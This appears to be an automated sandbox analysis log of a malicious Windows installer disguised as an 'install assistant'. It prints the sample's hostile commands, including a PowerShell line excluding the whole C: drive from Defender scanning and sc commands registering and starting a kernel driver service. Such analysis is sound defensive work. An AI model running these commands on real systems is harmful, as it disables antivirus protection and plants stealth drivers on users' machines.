Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpCode function: String function: 6CCE6F10 appears 727 times
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpCode function: String function: 6CC49240 appears 53 times
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: String function: 00F01E40 appears 151 times
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: String function: 00F9FB10 appears 723 times
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: String function: 00F028E3 appears 34 times
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.tmp.5.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.tmp.5.drStatic PE information: Number of sections : 11 > 10
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.tmp.0.drStatic PE information: Number of sections : 11 > 10
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.exeStatic PE information: Number of sections : 11 > 10
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.exe, 00000000.00000003.2134065444.000000007F3AA000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFileNameSSRClient.exe vs #U5b89#U88c5#U52a9#U624b_2.0.5.exe
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.exe, 00000000.00000003.2133531361.0000000002D7E000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFileNameSSRClient.exe vs #U5b89#U88c5#U52a9#U624b_2.0.5.exe
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.exe, 00000000.00000000.2131817158.0000000000529000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFileNameSSRClient.exe vs #U5b89#U88c5#U52a9#U624b_2.0.5.exe
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.exeBinary or memory string: OriginalFileNameSSRClient.exe vs #U5b89#U88c5#U52a9#U624b_2.0.5.exe
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: tProtect.dll.13.drBinary string: \Device\TfSysMon
Source: tProtect.dll.13.drBinary string: \Device\TfKbMonPWLCache
Source: classification engineClassification label: mal88.evad.winEXE@126/32@0/0
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpCode function: 6_2_6CC15D60 OpenProcessToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,NtInitiatePowerAction,6_2_6CC15D60
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_00F09313 _isatty,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,11_2_00F09313
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_00F13D66 __EH_prolog,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,11_2_00F13D66
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_00F09252 DeviceIoControl,GetModuleHandleW,GetProcAddress,GetDiskFreeSpaceW,11_2_00F09252
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpCode function: 6_2_6CC15240 CreateToolhelp32Snapshot,CloseHandle,Process32NextW,Process32FirstW,6_2_6CC15240
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpFile created: C:\Program Files (x86)\Windows NT\is-F6E4H.tmpJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5224:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5916:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:432:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2632:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5208:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6864:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2276:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5320:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4816:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3688:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2528:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2012:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5608:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6528:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2572:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4176:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6908:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6996:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5764:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3532:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4900:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:936:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6544:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4776:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2036:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3984:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3916:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5684:120:WilError_03
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exeFile created: C:\Users\user\AppData\Local\Temp\is-LPJ40.tmpJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganizationJump to behavior
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000002.00000003.2149336504.0000000003F19000.00000004.00001000.00020000.00000000.sdmp, is-R44JL.tmp.6.drBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000002.00000003.2149336504.0000000003F19000.00000004.00001000.00020000.00000000.sdmp, is-R44JL.tmp.6.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000002.00000003.2149336504.0000000003F19000.00000004.00001000.00020000.00000000.sdmp, is-R44JL.tmp.6.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000002.00000003.2149336504.0000000003F19000.00000004.00001000.00020000.00000000.sdmp, is-R44JL.tmp.6.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000002.00000003.2149336504.0000000003F19000.00000004.00001000.00020000.00000000.sdmp, is-R44JL.tmp.6.drBinary or memory string: SELECT data FROM %Q.'%q_node' WHERE nodeno=?Node %lld missing from databaseNode %lld is too small (%d bytes)Rtree depth out of range (%d)Node %lld is too small for cell count of %d (%d bytes)Dimension %d of cell %d on node %lld is corruptDimension %d of cell %d on node %lld is corrupt relative to parentwrong number of arguments to function rtreecheck()SELECT * FROM %Q.'%q_rowid'Schema corrupt or not an rtree_rowid_parentENDSELECT count(*) FROM %Q.'%q_%s'cannot open value of type %sno such rowid: %lldforeign keyindexedcannot open virtual table: %scannot open table without rowid: %scannot open view: %sno such column: "%s"cannot open %s column for writingblockDELETE FROM %Q.'%q_data';DELETE FROM %Q.'%q_idx';DELETE FROM %Q.'%q_docsize';version%s_nodedata_shape does not contain a valid polygon
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000002.00000003.2149336504.0000000003F19000.00000004.00001000.00020000.00000000.sdmp, is-R44JL.tmp.6.drBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000002.00000003.2149336504.0000000003F19000.00000004.00001000.00020000.00000000.sdmp, is-R44JL.tmp.6.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000002.00000003.2149336504.0000000003F19000.00000004.00001000.00020000.00000000.sdmp, is-R44JL.tmp.6.drBinary or memory string: SELECT %s WHERE rowid = ?SELECT rowid, rank FROM %Q.%Q ORDER BY %s("%w"%s%s) %sinvalid rootpageorphan indexsqlite_stat%dDELETE FROM %Q.%s WHERE %s=%QDELETE FROM %Q.sqlite_master WHERE name=%Q AND type='trigger'corrupt schemaUPDATE %Q.sqlite_master SET rootpage=%d WHERE #%d AND rootpage=#%dstattable %s may not be droppeduse DROP TABLE to delete table %suse DROP VIEW to delete view %stblDELETE FROM %Q.sqlite_sequence WHERE name=%QDELETE FROM %Q.sqlite_master WHERE tbl_name=%Q and type!='trigger' UNIQUEindexcannot create a TEMP index on non-TEMP table "%s"table %s may not be indexedviews may not be indexedvirtual tables may not be indexedthere is already a table named %sindex %s already existssqlite_autoindex_%s_%dexpressions prohibited in PRIMARY KEY and UNIQUE constraintsconflicting ON CONFLICT clauses specifiedCREATE%s INDEX %.*sINSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);name='%q' AND type='index'table "%s" has more than one primary keyAUTOINCREMENT is only allowed on an INTEGER PRIMARY KEYTABLEVIEW
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000002.00000003.2149336504.0000000003F19000.00000004.00001000.00020000.00000000.sdmp, is-R44JL.tmp.6.drBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.exeVirustotal: Detection: 8%
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.exeString found in binary or memory: /LOADINF="filename"
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exeFile read: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exe"
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exeProcess created: C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp "C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp" /SL5="$10404,4753080,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exe"
Source: C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpProcess created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exe" /VERYSILENT
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exeProcess created: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp "C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp" /SL5="$40418,4753080,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exe" /VERYSILENT
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpProcess created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald
Source: C:\Program Files (x86)\Windows NT\7zr.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpProcess created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs
Source: C:\Program Files (x86)\Windows NT\7zr.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Program Files (x86)\Windows NT\7zr.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Program Files (x86)\Windows NT\7zr.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exeProcess created: C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp "C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp" /SL5="$10404,4753080,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpProcess created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exe" /VERYSILENTJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exeProcess created: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp "C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp" /SL5="$40418,4753080,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exe" /VERYSILENTJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpProcess created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9ialdJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpProcess created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= autoJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoarJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoarJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
